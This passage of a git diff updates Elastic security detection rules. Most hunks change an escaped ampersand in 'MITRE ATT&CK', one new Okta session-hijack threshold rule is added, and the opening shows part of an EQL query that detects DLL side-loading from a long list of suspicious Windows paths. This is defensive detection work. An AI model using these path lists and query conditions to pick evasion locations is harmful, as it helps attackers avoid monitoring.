\"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json index c63b39e7c4e..d1276cbc026 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_105.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json index 7d9a1063b3f..275567f5bb5 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_106.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json index 63c3a032356..1129e227ac7 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_107.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json index 039e5d7fbb4..05102645944 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_207.json @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json index d6142151597..e578cbcfa40 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_208.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json index 9f66ede666d..e16b31b6639 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_209.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json index f9bf102a32e..af783f12774 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_210.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json index 37c864052aa..febbd1e9fcb 100644 --- a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_211.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json index e8f89ffe7cc..f4b05812cf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json +++ b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json index a0b4b5196b2..912695698d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json +++ b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json index 6922d8db855..7688a0b1577 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json index 81a75fde7ac..2f7f6230f6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json index b89ad384bfa..27dfe6cd579 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json index 178c11cf763..c1671a9e347 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json index 6ff8a47280e..9d01259eec3 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json index 823f4191a1a..329b0093048 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json index 356ddaee183..68d8097f559 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json index c2846b79868..6d1e6d49c5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json index cacfe88b8c7..be1a3b487c9 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2.json new file mode 100644 index 00000000000..e37c2dd60cb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user has started multiple Okta sessions with the same user account and different session IDs. This may indicate an attacker has compromised a user's Okta account and is using it to access the organization's resources.", + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Multiple Okta Client Addresses for a Single User Session", + "note": "", + "query": "event.dataset:okta.system\n and okta.authentication_context.external_session_id:* and okta.debug_context.debug_data.dt_hash:*\n and not (okta.actor.id: okta* or okta.actor.display_name: okta*)\n", + "references": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.display_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.authentication_context.external_session_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.debug_context.debug_data.dt_hash", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "okta.debug_context.debug_data.dt_hash", + "value": 2 + } + ], + "field": [ + "okta.actor.id", + "okta.authentication_context.external_session_id" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 2 + }, + "id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json index 6ab26c79f43..cf677b2eec0 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json index f8f525f997e..c44dff8870a 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json index ad798ab0a04..c24bdf0a688 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json index df28ea06795..2f584146404 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json index d74e0c7dcec..cce0b6aea64 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json index e469a647113..8e56e3a5c4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json index 744e8f6764f..608db4c2f67 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json index a723cd45792..395be669e62 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json index 02338a784c5..73b9275422d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json index c34562f0c1b..e49d2b1347e 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json index 